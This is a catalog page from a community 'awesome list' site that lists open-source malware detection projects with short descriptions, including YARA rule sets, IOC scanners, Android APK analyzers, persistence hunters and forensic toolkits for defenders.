Malware Detection
Showing 36 of 38 projects
An open-source unified XDR and SIEM platform for threat prevention, detection, and response across endpoints and cloud workloads.
A comprehensive collection of Yara rules for malware detection, vulnerability identification, and security analysis.
A curated list of awesome YARA rules, tools, and resources for malware researchers and security professionals.
A simple IOC and YARA scanner for detecting malware and security threats via file names, hashes, YARA rules, and C2 connections.
Identifies compilers, packers, obfuscators, and other characteristics in Android APK and DEX files.
A PowerShell module for Blue Teams, Incident Responders, and System Administrators to hunt persistence techniques implanted in Windows machines.
A suite of network fingerprinting standards for TLS, TCP, HTTP, SSH, and other protocols to facilitate threat detection and security analysis.
A forensic evidence collection and analysis toolkit for macOS, gathering system data to detect and investigate malware infections.
An obfuscation-neglect Android malware scoring system that analyzes APKs for malicious behavior patterns.
A tool for static vulnerability analysis and runtime monitoring of Docker images and containers to detect malware and anomalous activities.
A tool for static vulnerability analysis and runtime monitoring of Docker images and containers to detect malware and anomalous activities.
An open dataset and toolkit for training static PE malware machine learning models, featuring millions of labeled Windows executable samples.
An open dataset and toolkit for training static PE malware machine learning models, featuring extracted features from millions of Windows executable files.
A CLI tool for real-time malicious package detection and software supply chain security across multiple ecosystems.
Scans files and process memory for Cobalt Strike beacons and extracts their configuration.
A lightweight Bash script for scanning Linux/Unix/OSX systems for Indicators of Compromise (IOCs) without installation.
Enumerates persistently installed software on macOS, similar to AutoRuns for Windows.
Route-level file upload security for Node.js, scanning files for malware, spoofing, and risky archives before storage.
A portable utility that identifies linkers, compilers, and packers used to create executable files across Windows, Linux, and macOS.
A static code analyzer that detects and reports potential malicious behaviors in Android applications.
A collection of publicly shared Indicators of Compromise (IOCs) from FireEye for threat intelligence and security research.
A dynamic API calls tracer for Windows and Linux applications, built on DynamoRIO for transparent malware analysis.
A framework for automated extraction of static and dynamic features from Android APKs for malware detection.
A PowerShell module for live incident response that enumerates Windows autorun artifacts to detect persistence mechanisms used by malware and legitimate programs.
A curated list of tools and resources for understanding, detecting, and removing malware persistence techniques across operating systems.
A Python library for creating adversarial attacks against Windows malware detectors to evaluate their robustness.
A GitHub Action to upload and scan files for malware using VirusTotal's analysis engine.
A Python tool for automating Android device security hardening, malware detection, and privacy protection via ADB.
A Python tool for advanced analysis of Windows AppCompat/AmCache forensic artifacts, enabling threat hunting beyond basic grep techniques.
A curated collection of information and tools for detecting, analyzing, and hunting malware persistence mechanisms across operating systems.
A simple, self-contained modular host-based IOC scanner built around the YARA pattern matching engine.
A browser emulation tool that detects exploits targeting browser and browser plugin vulnerabilities by analyzing various file types.
A tool to verify scripts and executables by hash to prevent supply chain attacks.
A Python tool that extracts HTTP streams from PCAP files and scans them with YARA rules for security analysis.
A honeypot that emulates USB storage devices to detect and capture malware that spreads via USB propagation.
A Python script that monitors and alerts on indicators of compromise (IOCs) using Google Custom Search Engines and Safe Browsing APIs.
Related Tags
Found a gem we're missing?
Open-Awesome is built by the community, for the community. Submit a project, suggest an awesome list, or help improve the catalog on GitHub.